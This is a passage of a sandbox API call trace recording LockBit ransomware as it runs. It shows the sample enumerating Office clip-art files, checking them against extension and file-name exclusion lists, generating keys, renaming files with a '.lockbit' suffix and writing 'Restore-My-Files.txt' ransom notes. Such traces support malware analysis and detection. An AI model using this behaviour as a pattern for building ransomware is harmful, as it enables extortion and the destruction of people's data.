hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2834) returned 1 [0173.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.588] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.592] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.592] malloc (_Size=0xa2) returned 0x1fa2ed8 [0173.592] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0173.594] free (_Block=0x1fa2ed8) [0173.594] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.594] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.594] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.594] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a829930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="RE00006_.WMF", cAlternateFileName="")) returned 1 [0173.594] lstrcmpiW (lpString1=".", lpString2="RE00006_.WMF") returned -1 [0173.594] lstrcmpiW (lpString1="..", lpString2="RE00006_.WMF") returned -1 [0173.594] PathFindExtensionW (pszPath="RE00006_.WMF") returned=".WMF" [0173.594] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.594] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.595] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.595] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="RE00006_.WMF") returned 1 [0173.596] lstrcmpiW (lpString1="ntldr", lpString2="RE00006_.WMF") returned -1 [0173.596] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="RE00006_.WMF") returned -1 [0173.596] lstrcmpiW (lpString1="bootsect.bak", lpString2="RE00006_.WMF") returned -1 [0173.596] lstrcmpiW (lpString1="autorun.inf", lpString2="RE00006_.WMF") returned -1 [0173.596] lstrcmpiW (lpString1="thumbs.db", lpString2="RE00006_.WMF") returned 1 [0173.596] lstrcmpiW (lpString1="iconcache.db", lpString2="RE00006_.WMF") returned -1 [0173.596] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.596] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF") returned=".WMF" [0173.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.596] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.596] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.597] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.597] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF.lockbit") returned 72 [0173.597] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\re00006_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.618] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.618] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.618] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1772) returned 1 [0173.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.619] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.622] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.622] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.622] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.625] free (_Block=0x1fa2ed8) [0173.625] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.625] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.625] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x5a84fa90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x0, dwReserved1=0x0, cFileName="RECYCLE.WMF", cAlternateFileName="")) returned 1 [0173.625] lstrcmpiW (lpString1=".", lpString2="RECYCLE.WMF") returned -1 [0173.626] lstrcmpiW (lpString1="..", lpString2="RECYCLE.WMF") returned -1 [0173.626] PathFindExtensionW (pszPath="RECYCLE.WMF") returned=".WMF" [0173.626] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.626] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.627] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.627] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="RECYCLE.WMF") returned 1 [0173.628] lstrcmpiW (lpString1="ntldr", lpString2="RECYCLE.WMF") returned -1 [0173.628] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="RECYCLE.WMF") returned -1 [0173.628] lstrcmpiW (lpString1="bootsect.bak", lpString2="RECYCLE.WMF") returned -1 [0173.628] lstrcmpiW (lpString1="autorun.inf", lpString2="RECYCLE.WMF") returned -1 [0173.628] lstrcmpiW (lpString1="thumbs.db", lpString2="RECYCLE.WMF") returned 1 [0173.628] lstrcmpiW (lpString1="iconcache.db", lpString2="RECYCLE.WMF") returned -1 [0173.628] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.628] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF") returned=".WMF" [0173.628] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.628] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.628] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.629] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.629] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF.lockbit") returned 71 [0173.629] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\recycle.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.630] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.630] malloc (_Size=0x40068) returned 0x3d70450 [0173.630] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3350) returned 1 [0173.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.632] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.635] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.635] malloc (_Size=0xa4) returned 0x1fa2ed8 [0173.635] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0173.637] free (_Block=0x1fa2ed8) [0173.637] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.637] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.637] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.637] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ab85e0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0x80ab85e0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0x80ab85e0, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0173.637] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0173.637] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0173.637] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0173.637] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0173.637] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0173.638] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0173.638] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0173.638] lstrcmpiW 